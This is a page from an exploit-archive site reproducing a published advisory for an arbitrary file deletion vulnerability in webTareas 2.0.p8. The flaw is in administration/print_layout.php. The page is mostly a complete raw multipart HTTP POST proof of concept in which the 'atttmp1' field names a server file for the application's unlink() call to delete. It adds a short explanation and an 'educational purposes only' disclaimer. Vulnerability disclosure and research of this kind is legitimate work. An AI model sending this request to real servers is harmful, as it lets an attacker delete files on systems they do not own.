Webtareas 2.0.p8 arbitrary file deletion Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2020-05-06 | Type : webapps | Platform : php
This exploit / vulnerability Webtareas 2.0.p8 arbitrary file deletion is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Exploit Title: webTareas 2.0.p8 - Arbitrary File Deletion
# Date: 2020-05-02
# Author: Besim ALTINOK
# Vendor Homepage: https://sourceforge.net/projects/webtareas/files/
# Software Link: https://sourceforge.net/projects/webtareas/files/
# Version: v2.0.p8
# Tested on: Xampp
# Credit: İsmail BOZKURT


Description:
--------------------------------------------------------------------------------------

- print_layout.php is vulnerable. When you sent PoC code to the server and
If there is no file on the server, you can see, this error message

<br />
<b>Warning</b>:
unlink(/Applications/XAMPP/xamppfiles/htdocs/webtareas/files/PrintLayouts/tester.png.php--1.zip):
No such file or directory in
<b>/Applications/XAMPP/xamppfiles/htdocs/webtareas/includes/library.php</b>
on line <b>1303</b><br />

- So, Here, you can delete file with unlink function.
- And, I ddi try again with another file, I deleted from the server.
--------------------------------------------------------------------------------------------

Arbitrary File Deletion PoC
---------------------------------------------------------------------------------------

POST
/webtareas/administration/print_layout.php?doc_type=11&doc_type_ex=&id=1&mode=edit&borne1=0
HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 ***********************
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
http://localhost/webtareas/administration/print_layout.php?doc_type=11&doc_type_ex=&mode=edit&borne1=0&id=1
Content-Type: multipart/form-data;
boundary=---------------------------3678767312987982041084647942
Content-Length: 882
DNT: 1
Connection: close
Cookie: webTareasSID=4b6a4799c9e7906a06c574dc48ffb730;
PHPSESSIDwebERPteam=9b2b068ea2de93ed1ee0aafe27818191
Upgrade-Insecure-Requests: 1

-----------------------------3678767312987982041084647942
Content-Disposition: form-data; name="action"

edit
-----------------------------3678767312987982041084647942
Content-Disposition: form-data; name="desc"

<p>tester</p>
-----------------------------3678767312987982041084647942
Content-Disposition: form-data; name="file1"; filename=""
Content-Type: application/octet-stream


-----------------------------3678767312987982041084647942
Content-Disposition: form-data; name="attnam1"


-----------------------------3678767312987982041084647942
Content-Disposition: form-data; name="atttmp1"

--add the delete file name here--
-----------------------------3678767312987982041084647942
Content-Disposition: form-data; name="sp"


-----------------------------3678767312987982041084647942--

Webtareas 2.0.p8 arbitrary file deletion


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Webtareas 2.0.p8 arbitrary file deletion Vulnerability / Exploit